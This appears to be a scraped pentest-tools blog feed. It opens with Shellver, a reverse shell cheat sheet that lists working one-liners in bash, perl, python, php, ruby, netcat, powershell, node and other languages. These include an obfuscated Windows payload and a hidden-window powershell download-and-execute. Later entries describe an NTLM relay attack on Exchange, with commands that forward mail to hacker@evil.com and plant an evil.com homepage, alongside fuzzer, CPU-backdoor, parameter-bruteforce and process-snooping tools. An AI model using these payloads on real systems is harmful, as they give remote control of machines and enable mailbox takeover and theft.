Shellver – Reverse Shell Cheat Sheet Tool

Reverse Shell Cheat Sheet ToolInstall NoteClone the repository:git clone https://github.com/0xR0/shellver.gitThen go inside:cd shellver/Then install it:python setup.py -irun shellver -h or “shellver bash or perl {} python {} php {} ruby {} netcat {} xterm {} shell {} all".format (or)Exampleshellver pythonshellver allFrom https://github.com/swisskyrepoReverse Shell MethodsReverse Shell Cheat SheetBash TCPbash -i >& /dev/tcp/10.0.0.1/8080 0>&10<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196Bash UDPVictim:sh -i >& /dev/udp/127.0.0.1/4242 0>&1Listener:nc -u -lvp 4242Perlperl -e ‘use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’NOTE: Windows onlyperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’PythonLinux onlypython -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")’python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’Windows onlyC:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect((‘10.11.0.37’, 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type(‘except’, (), {‘__enter__’: lambda self: None, ‘__exit__’: lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type(‘try’, (), {‘__enter__’: lambda self: None, ‘__exit__’: lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g[‘p2s_thread’] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g[‘s2p_thread’] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g[‘p’] in [(subprocess.Popen([‘\\windows\\system32\\cmd.exe’], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g[‘s’] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[‘p2s’], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l[‘s’].send(__l[‘p’].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l[‘s’], __l[‘p’] in [(s, p)]][0])({}), ‘p2s’)]][0] for __g[‘s2p’], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l[‘p’].stdin.write(__l[‘data’]), __after())[1] if (len(__l[‘data’]) > 0) else __after())(lambda: __this()) for __l[‘data’] in [(__l[‘s’].recv(1024))]][0] if True else __after())())(lambda: None) for __l[‘s’], __l[‘p’] in [(s, p)]][0])({}), ‘s2p’)]][0] for __g[‘os’] in [(__import__(‘os’, __g, __g))]][0] for __g[‘socket’] in [(__import__(‘socket’, __g, __g))]][0] for __g[‘subprocess’] in [(__import__(‘subprocess’, __g, __g))]][0] for __g[‘threading’] in [(__import__(‘threading’, __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__(‘contextlib’))"PHPphp -r ‘$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’Rubyruby -rsocket -e’f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)’ruby -rsocket -e ‘exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end’NOTE: Windows onlyruby -rsocket -e ‘c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end’Netcat Traditionalnc -e /bin/sh [IPADDR] [PORT]Netcat OpenBsdrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fNcatncat 127.0.0.1 4444 -e /bin/bashncat –udp 127.0.0.1 4444 -e /bin/bashPowershellpowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(‘10.1.3.40’,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"powershell IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1’)Awkawk ‘BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}’ /dev/nullJavar = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()LuaLinux onlylua -e "require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘10.0.0.1′,’1234’);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);"Windows and Linuxlua5.1 -e ‘local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, ‘r’) local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()’NodeJS(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8080, "10.17.26.64", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing})();orrequire(‘child_process’).exec(‘nc -e /bin/sh [IPADDR] [PORT]’)or-var x = global.process.mainModule.require-x(‘child_process’).exec(‘nc [IPADDR] [PORT] -e /bin/bash’)Groovy – by frohoffNOTE: Java reverse shell also work for GroovyString host="localhost";int port=8044;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();Spawn TTY/bin/sh -i(From an interpreter)python -c ‘import pty; pty.spawn("/bin/sh")’perl -e ‘exec "/bin/sh";’perl: exec "/bin/sh";ruby: exec "/bin/sh"lua: os.execute(‘/bin/sh’)Access shortcuts, su, nano and autocomplete in a partially tty shell /!\ OhMyZSH might break this trick, a simple sh is recommended# in hostctrl+zstty raw -echofg# in reverse shellresetexport SHELL=bashexport TERM=xterm-256colorstty rows <num> columns <cols>(From within vi):!bash:set shell=/bin/bash:shell(From within nmap)!shThanks toReverse Bash Shell One LinerPentest Monkey – Cheat Sheet Reverse shellSpawning a TTY ShellObtaining a fully interactive shellDownload Shellver

Link: http://feedproxy.google.com/~r/PentestTools/~3/WvRAR8EYKf0/shellver-reverse-shell-cheat-sheet-tool.html

Sandsifter – The X86 Processor Fuzzer

The sandsifter audits x86 processors for hidden instructions and hardware bugs, by systematically generating machine code to search through a processor’s instruction set, and monitoring execution for anomalies. Sandsifter has uncovered secret processor instructions from every major vendor; ubiquitous software bugs in disassemblers, assemblers, and emulators; flaws in enterprise hypervisors; and both benign and security-critical hardware bugs in x86 chips.With the multitude of x86 processors in existence, the goal of the tool is to enable users to check their own systems for hidden instructions and bugs.To run a basic audit against your processor:sudo ./sifter.py –unk –dis –len –sync –tick — -P1 -tThe computer is systematically scanned for anomalous instructions. In the upper half, you can view the instructions that the sandsifter is currently testing on the processor. In the bottom half, the sandsifter reports anomalies it finds.The search will take from a few hours to a few days, depending on the speed of and complexity of your processor. When it is complete, summarize the results:./summarize.py data/logTypically, several million undocumented instructions on your processor will be found, but these generally fall into a small number of different groups. After binning the anomalies, the summarize tool attempts to assign each instruction to an issue category:Software bug (for example, a bug in your hypervisor or disassembler),Hardware bug (a bug in your CPU), orUndocumented instruction (an instruction that exists in the processor, but is not acknowledged by the manufacturer)Press ‘Q’ to quit and obtain a text based summary of the system scan:The results of a scan can sometimes be difficult for the tools to automatically classify, and may require manual analysis. For help analyzing your results, feel free to send the ./data/log file to xoreaxeaxeax@gmail.com. No personal information, other than the processor make, model, and revision (from /proc/cpuinfo) are included in this log.ResultsScanning with the sandsifter has uncovered undocumented processor features across dozens of opcode categories, flaws in enterprise hypervisors, bugs in nearly every major disassembly and emulation tool, and critical hardware bugs opening security vulnerabilities in the processor itself.Details of the results can be found in the project whitepaper.(TODO: detailed results enumeration here)BuildingSandsifter requires first installing the Capstone disassembler: http://www.capstone-engine.org/. Capstone can typically be installed with:sudo apt-get install libcapstone3 libcapstone-devsudo pip install capstoneSandsifter can be built with:makeand is then run withsudo ./sifter.py –unk –dis –len –sync –tick — -P1 -tFlagsFlags are passed to the sifter with –flag, and to the injector with — -f.Example:sudo ./sifter.py –unk –dis –len –sync –tick — -P1 -tSifter flags:–len search for length differences in all instructions (instructions that executed differently than the disassembler expected, or did not exist when the disassembler expected them to–dis search for length differences in valid instructions (instructions that executed differently than the disassembler expected)–unk search for unknown instructions (instructions that the disassembler doesn’t know about but successfully execute)–ill the inverse of –unk, search for invalid disassemblies (instructions that do not successfully execute but that the disassembler acknowledges)–tick periodically write the current instruction to disk–save save search progress on exit–resume resume search from last saved state–sync write search results to disk as they are found–low-mem do not store results in memoryInjector flags:-b mode: brute force-r mode: randomized fuzzing-t mode: tunneled fuzzing-d mode: externally directed fuzzing-R raw output mode-T text output mode-x write periodic progress to stderr-0 allow null dereference (requires sudo)-D allow duplicate prefixes-N no nx bit support-s seed in random search, seed value-B brute_depth in brute search, maximum search depth-P max_prefix maximum number of prefixes to search-i instruction instruction at which to start search (inclusive)-e instruction instruction at which to end search (exclusive)-c core core on which to perform search-X blacklist blacklist the specified instruction-j jobs number of simultaneous jobs to run-l range_bytes number of base instruction bytes in each sub rangeKeysm: Mode – change the search mode (brute force, random, or tunnel) for the sifterq: Quit – exit the sifterp: Pause – pause or unpause the searchAlgorithmsThe scanning supports four different search algorithms, which can be set at the command line, or cycled via hotkeys.Random searching generates random instructions to test; it generally produces results quickly, but is unable to find complex hidden instructions and bugs.Brute force searching tries instructions incrementally, up to a user-specified length; in almost all situations, it performs worse than random searching.Driven or mutation driven searching is designed to create new, increasingly complex instructions through genetic algorithms; while promising, this approach was never fully realized, and is left as a stub for future research.Tunneling is the approach described in the presentation and white paper, and in almost all cases provides the best trade-off between thoroughness and speed.TipssudoFor best results, the tool should be run as the root user. This is necessary so that the process can map into memory a page at address 0, which requires root permissions. This page prevents many instructions from seg-faulting on memory accesses, which allows a more accurate fault analysis. PrefixesThe primary limitation for the depth of an instruction search is the number of prefix bytes to explore, with each additional prefix byte increasing the search space by around a factor of 10. Limit prefix bytes with the -P flag. ColorsThe interface for the sifter is designed for a 256 color terminal. While the details vary greatly depending on your terminal, this can roughly be accomplished with: export TERM=’xterm-256color’GUIThe interface assumes the terminal is of at least a certain size; if the interface is not rendering properly, try increasing the terminal size; this can often be accomplished by decreasing the terminal font size.In some cases, it may be desirable or necessary to run the tool without the graphical front end. This can be done by running the injector directly: sudo ./injector -P1 -t -0To filter the results of a direct injector invocation, grep can be used. For example, sudo ./injector -P1 -r -0 | grep ‘\.r’ | grep -v sigillsearches for instructions for which the processor and disassembler disagreed on the instruction length (grep ‘.r’), but the instruction successfully executed (grep -v sigill). Targeted fuzzingIn many cases, it is valuable to direct the fuzzer to a specific target. For example, if you suspect that an emulator has flaws around repeated ‘lock’ prefixes (0xf0), you could direct the fuzzer to search this region of the instruction space with the -i and -e flags: sudo ./sifter.py –unk –dis –len –sync –tick — -t -i f0f0 -e f0f1 -D -P15Legacy systemsFor scanning much older systems (i586 class processors, low memory systems), pass the –low-mem flag to the sifter and the -N flag to the injector: sudo ./sifter.py –unk –dis –len –sync –tick –low-mem — -P1 -t -NIf you observe your scans completing too quickly (for example, a scan completes in seconds), it is typically because these flags are required for the processor you are scanning. 32 vs. 64 bitBy default, sandsifter is built to target the bitness of the host operating system. However, some instructions have different behaviors when run in a 32 bit process compared to when run in a 64 bit process. To explore these scenarios, it is sometimes valuable to run a 32 bit sandsifter on a 64 bit system.To build a 32 bit sandsifter on a 64 bit system, Capstone must be installed as 32 bit; the instructions for this can be found at http://www.capstone-engine.org/.Then sandsifter must be built for a 32 bit architecture: make CFLAGS=-m32With this, the 32 bit instruction space can be explored on a 64 bit system. ReferencesA discussion of the techniques and results can be found in the Black Hat presentation.Technical details are described in the whitepaper.Slides from the Black Hat presentation are here.Authorsandsifter is a research effort from Christopher Domas (@xoreaxeaxeax).Download Sandsifter

Link: http://feedproxy.google.com/~r/PentestTools/~3/-g6zbj5Gyk4/sandsifter-x86-processor-fuzzer.html

Docker TOR Hidden Service – Easily Setup A Hidden Service Inside The Tor Network

Easily run a hidden service inside the Tor network with this containerGenerate the skeleton configuration for you hidden service, replace for your hidden service pattern name. Example, if you want to your hidden service contain the word ‘boss’, just use this word as argument. You can use regular expressions, like ^boss, will generate an address wich will start with ‘boss’. Be aware that bigger the pattern, more time it will take to generate it.docker run -it –rm -v $(pwd)/web:/web \ strm/tor-hiddenservice-nginx generate Create an container named ‘hiddensite’ to serve your generated hidden servicedocker run -d –restart=always –name hiddensite -v $(pwd)/web:/web \ strm/tor-hiddenservice-nginx ExampleLet’s create a hidden service with the name beginning with strm.docker pull strm/tor-hiddenservice-nginxWait to the container image be downloaded. And them we can generate our site skeleton:$docker run -it –rm -v $(pwd)/web:/web strm/tor-hiddenservice-nginx generate ^strm[+] Generating the address with mask: ^strm[+] Found matching domain after 137072 tries: strmfyygjp5st54g.onion[+] Generating nginx configuration for site strmfyygjp5st54g.onion[+] Creating www folder[+] Generating index.html templateNow we have our skeleton generated, we can run the container with:docker run -d –restart=always –name hiddensite \ -v $(pwd)/web:/web strm/tor-hiddenservice-nginxAnd you have the service running ! :)Troubleshoot403 error on nginx, check your directory permissions and folder permissions. Nginx run as “hidden" user, his UID is 666, just check if you give this user access to the /web/www folder (in the case the folder mapped to it).Builddocker build -t strm/tor-hiddenservice-nginx .Rundocker run -d –restart=always –name hiddensite-v $(pwd)/web:/web strm/tor-hiddenservice-nginxShelldocker run -it –rm -v $(pwd)/web:/web–entrypoint /bin/bash strm/tor-hiddenservice-nginxDownload Docker-Tor-Hiddenservice-Nginx

Link: http://feedproxy.google.com/~r/PentestTools/~3/O5qn-eFrwys/docker-tor-hidden-service-easily-setup.html

Rosenbridge – Hardware Backdoors In Some X86 CPUs

project:rosenbridge reveals a hardware backdoor in some desktop, laptop, and embedded x86 processors.The backdoor allows ring 3 (userland) code to circumvent processor protections to freely read and write ring 0 (kernel) data. While the backdoor is typically disabled (requiring ring 0 execution to enable it), we have found that it is enabled by default on some systems.This repository contains utilities to check if your processor is affected, close the backdoor if it is present, and the research and tools used to discover and analyze the backdoor.The BackdoorThe rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the ‘deeply embedded instruction set’), bypassing all memory protections and privilege checks.While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU’s memory, but its register file and execution pipeline as well.Affected SystemsIt is thought that only VIA C3 CPUs are affected by this issue. The C-series processors are marketed towards industrial automation, point-of-sale, ATM, and healthcare hardware, as well as a variety of consumer desktop and laptop computers.Looking ForwardThe scope of this vulnerability is limited; generations of CPUs after the C3 no longer contain this feature.This work is released as a case study and thought experiment, illustrating how backdoors might arise in increasingly complex processors, and how researchers and end-users might identify such features. The tools and research offered here provide the starting point for ever-deeper processor vulnerability research.Checking your CPUTo check if your CPU is affected:git clone https://github.com/xoreaxeaxeax/rosenbridgecd rosenbridge/utilmakesudo modprobe msrsudo ./bin/checkThe provided utility must be run on baremetal (not in a virtual-machine), and is in an alpha state. It may crash, panic, or hang systems not containing the backdoor.The utilities provided here are designed around a specific processor family and core; unfortunately, the tools will miss the backdoor if it has been even slightly modified from the researched form.Closing the BackdoorSome systems have the backdoor enabled by default, allowing unprivileged code to gain kernel level access without permission. If the steps in ‘Checking your CPU’ indicate that your CPU is vulnerable, you can install a script to close the backdoor early in the boot process:cd fixmakesudo make installrebootNote that, even with this, an attacker with kernel level access can still re-enable the backdoor. This script is provided as an outline for correcting the issue during the boot process, but will require adaptation for different systems.Tools and TechniquesThe sandsifter utility is used extensively in this research for uncovering unknown instructions.asmAn assembler for the Deeply Embedded Instruction Set (DEIS). It converts programs written in the custom rosenbridge assembly into x86 instructions, which, when executed following the launch-instruction, will send the commands to the hidden CPU core. escA proof-of-concept of using the rosenbridge backdoor for privilege escalation. fixA rough outline for closing the vulnerability on affected systems, to the extent possible through model-specific-register updates. fuzzA collection of utilities used to fuzz both the x86 and rosenbridge cores, in order to isolate the unknown launch-instruction and bridge-instruction, and resolve the instruction format of the rosenbridge core. deisThe fuzzer used to explore the effects and capabilities of the hidden CPU core. exitIt is thought that, on some processors, an exit sequence is needed to switch back to the x86 core at the end of a DEIS sequence. This directory contains the utilities used to search for the exit sequence in early stages of the research, but was abandoned when a processor was found not requiring any such sequence. managerA collection of python utilities designed to monitor and manage fuzzing tasks distributed across a network of workers. wrapA stripped down version of the sandsifter fuzzer, used to identify the bridge-instruction that will send commands from the x86 core to the hidden rosenbridge core. kernA collection of helper utilities used to monitor kernel memory and registers for changes caused by fuzzed DEIS instructions. lockUtilities to lock or unlock the rosenbridge backdoor. procA tool to identify patterns from the fuzzing logs to identify classes of DEIS instruction behaviors. testA tool used early in the research, to attempt to identify the hidden core’s architecture by executing known RISC instructions. utilAn alpha-state tool to detect whether or not a processor is affected by rosenbridge. DisclaimerThe details and implications presented in this work are the authors’ inferences and opinions, derived from the research described. The research is performed and provided with the goal of identifying and fixing a perceived security vulnerability on the described CPUs. VIA processors are renowned for their low power usage and excellence in embedded designs; we believe that the functionality described was created in good faith as a useful feature for the embedded market, and was unintentionally left enabled on some early generations of the processor. No malicious intent is implied.Authorproject:rosenbridge is a research effort from Christopher Domas (@xoreaxeaxeax).Download Rosenbridge

Link: http://feedproxy.google.com/~r/PentestTools/~3/b_Cip67DfsU/rosenbridge-hardware-backdoors-in-some.html

NtlmRelayToEWS – Ntlm Relay Attack To Exchange Web Services

ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS). It spawns an SMBListener on port 445 and an HTTPListener on port 80, waiting for incoming connection from the victim. Once the victim connects to one of the listeners, an NTLM negociation occurs and is relayed to the target EWS server.Obviously this tool does NOT implement the whole EWS API, so only a handful of services are implemented that can be useful in some attack scenarios. I might be adding more in the future. See the ‘usage’ section to get an idea of which EWS calls are being implemented.Limitations and ImprovementsExchange version:I’ve tested this tool against an Exchange Server 2010 SP2 only (which is quite old admitedly), so all EWS SOAP request templates, as well as the parsing of the EWS responses, are only tested for this version of Exchange. Although I’ve not tested myself, some reported this tool is also working against an Exchange 2016 server, out of the box (ie: without any changes to the SOAP request templates).In case those SOAP requests wouldn’t work on another version of Exchange, it is pretty easy to create the SOAP request templates to match a newer version by using the Microsoft EWS Managed API in trace mode and capture the proper SOAP requests (that’s how I did it !).EWS SOAP client:I would have loved to use a SOAP client in order to get a proper interface for automatically create all SOAP requests based on the Exchange WSDL. I tried using ‘zeep’ but I banged my head on the wall to get it working with the Exchange WSDL as it requires to download external namespaces and as such requires an internet connection. Also, with ‘zeep’, the use of a custom transport session requires a Requests.session which is not the type of HTTP(S) session we have by default with the HTTPClientRelay: it would have required either to refactor the HTTPClientRelay to use ‘Requests’ (/me lazy) or to simply get zeep to create the messages with zeep.client.create_message() and then send it with the relayed session we already have. Or is it because I’m a lame developper ? oh well…PrerequisitesntlmRelayToEWS requires a proper/clean install of Impacket. So follow their instructions to get a working version of Impacket.UsagentlmRelayToEWS implements the following attacks, which are all made on behalf of the relayed user (victim).Refer to the help to get additional info: ./ntlmRelayToEWS -h. Get more debug information using the –verbose or -v flag.sendMailSends an HTML formed e-mail to a list of destinations:./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d “user1@corporate.org,user2@corporate.com" -s Subject -m sampleMsg.htmlgetFolderRetrieves all items from a predefined folder (inbox, sent items, calendar, tasks):./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inboxforwardRuleCreates an evil forwarding rule that forwards all incoming message for the victim to another email address:./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d hacker@evil.comsetHomePageDefines a folder home page (usually for the Inbox folder) by specifying a URL. This technique, uncovered by SensePost/Etienne Stalmans allows for arbitray command execution in the victim’s Outlook program by forging a specific HTML page: Outlook Home Page – Another Ruler Vector:./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u http://path.to.evil.com/evilpage.htmladdDelegateSets a delegate address on the victim’s primary mailbox. In other words, the victim delegates the control of its mailbox to someone else. Once done, it means the delegated address has full control over the victim’s mailbox, by simply opening it as an additional mailbox in Outlook:./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.orgHow to get the victim to give you their credentials for relaying ?In order to get the victim to send his credentials to ntlmRelayToEWS you can use any of the following well known methods:Send the victim an e-mail with a hidden picture which ‘src’ attribute points to the ntlmRelayToEWS server, using either HTTP or SMB. Check the Invoke-SendEmail.ps1 script to achieve this.Create a link file which ‘icon’ attribute points to the ntlmRelayToEWS using a UNC path and let victim browse a folder with this linkPerform LLMNR, NBNS or WPAD poisonning (think of Responder.py or Invoke-Inveigh for instance) to get any corresponding SMB or HTTP trafic from the victim sent to ntlmRelayToEWSother ?AuthorArno0x0x – @Arno0x0xDownload NtlmRelayToEWS

Link: http://feedproxy.google.com/~r/PentestTools/~3/zanvCs_Gx7U/ntlmrelaytoews-ntlm-relay-attack-to.html

Aron – A GO Script For Finding Hidden GET & POST Parameters

Aron is a simple GO script for finding hidden GET & POST parameters with bruteforce.Installation$ git clone https://github.com/m4ll0k/Aron.git aron$ cd aron $ go get github.com/m4ll0k/printer# now check if $GOPATH is set$ go env | grep -i gopath# if $GOPATH not set, try with:$ export GOPATH=$HOME/go$ go run aron.go# OR $ go build aron.go$ cp aron /usr/bin/$ aronUsage ___ / | _________ ___ / /| | / ___/ __ \/ __\ / ___ |/ / / /_/ / / / / /_/ |_/_/ \____/_/ /_/ (v0.1.0 beta)—————————- Momo (M4ll0k) Outaadi Usage of aron: -data=”": Set post data -get=false: Set get method -post=false: Set post method -url="": Set target URL -wordlist="dict.txt": Set your wordlistGET BRUTEFORCE:$ go run aron.go -url http://www.test.com/index.php -get $ go run aron.go -url http://www.test.com/index.php<[?|id=1|id=1&]> -get$ go run aron.go -url http://www.test.com/index.php<[?|id=1|id=1&]> -get -wordlist my_wordlist.txt<[?|id=1|id=1&]> => Possible end URLOR Note: in this case aron need the wordlist path$ aron -url http://www.test.com/index.php -get -wordlist path/wordlist.txt$ aron -url http://www.test.com/index.php<[?|id=1|id=1&]> -get -wordlist path/wordlist.txtPOST BRUTEFORCE:$ go run aron.go -url http://www.test.com/index.php -post $ go run aron.go -url http://www.test.com/index.php<[?id=1]> -post$ go run aron.go -url http://www.test.com/index.php<[?id=1]> -post -data "user=1"$ go run aron.go -url http://www.test.com/index.php<[?id=1]> -post -data "user=1" -wordlist my_wordlistOR Note: in this case aron need the wordlist path$ aron -url http://www.test.com/index.php -post -wordlist path/wordlist.txt$ aron -url http://www.test.com/index.php<[?id=1]> -post -data "user=1" -wordlist path/wordlist.txtDownload Aron

Link: http://feedproxy.google.com/~r/PentestTools/~3/aUZYreq7Jl0/aron-go-script-for-finding-hidden-get.html

StegCracker – Steganography Brute-Force Utility To Uncover Hidden Data Inside Files

Steganography brute-force utility to uncover hidden data inside files.UsageUsing stegcracker is simple, pass a file to it as it’s first parameter and optionally pass the path to a wordlist of passwords to try as it’s second parameter. If this is not set it will default to the rockyou.txt password file which ships with Kali Linux or can be downloaded here.$ stegcracker [<wordlist>]InstallationTo install the program, follow these steps:$ sudo apt-get install steghide -y$ sudo curl https://raw.githubusercontent.com/Paradoxis/StegCracker/master/stegcracker > /bin/stegcracker$ sudo chmod +x /bin/stegcrackerDownload StegCracker

Link: http://feedproxy.google.com/~r/PentestTools/~3/53UjPDtT0NY/stegcracker-steganography-brute-force.html

Pspy – Monitor Linux Processes Without Root Permissions

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.The tool gathers it’s info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.Getting startedGet the tool onto the Linux machine you want to inspect. First get the binaries.You can build them yourself by running make build-build-image to build a docker image used in make build to build four binaries:32 bit big, static version: pspy3264 bit big, static version: pspy6432 bit small version: pspy32s64 bit small version: pspy64s The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (<1MB).You can run pspy --help to learn about the flags and their meaning. The summary is as follows:-p: enables printing commands to stdout (enabled by default)-f: enables printing file system events to stdout (disabled by default)-r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).-d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).-i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.-c: print events in different colors. Red for new processes, green for new Inotify events.The default settings should be fine for most applications. Watching files inside /usr is most important since many tools will access libraries inside it.Some more complex examples:# print both commands and file system events and scan procfs every 1000 ms (=1sec)./pspy64 -pf -i 1000 # place watchers recursively in two directories and non-recursively into a third./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir# disable printing discovered commands but enable file system events./pspy64 -p=false -fExamplesCron job watchingTo see the tool in action, just clone the repo and run make example (Docker needed). It is known passing passwords as command line arguments is not safe, and the example can be used to demonstrate it. The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute. pspy run in foreground, as user myuser, and scans for processes. You should see output similar to this:~/pspy (master) $ make example[...]docker run -it --rm local/pspy-example:latest[+] cron started[+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)[+] Starting pspy now...Watching recursively : [/usr /tmp /etc /home /var /opt] (6)Watching non-recursively: [] (0)Printing: processes=true file-system events=false2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now2018/02/18 21:00:03 CMD: UID=0 PID=9 | cron -f2018/02/18 21:00:03 CMD: UID=0 PID=7 | sudo cron -f2018/02/18 21:00:03 CMD: UID=1000 PID=14 | pspy2018/02/18 21:00:03 CMD: UID=1000 PID=1 | /bin/bash /entrypoint.sh2018/02/18 21:01:01 CMD: UID=0 PID=20 | CRON -f2018/02/18 21:01:01 CMD: UID=0 PID=21 | CRON -f2018/02/18 21:01:01 CMD: UID=0 PID=22 | python3 /root/scripts/password_reset.py2018/02/18 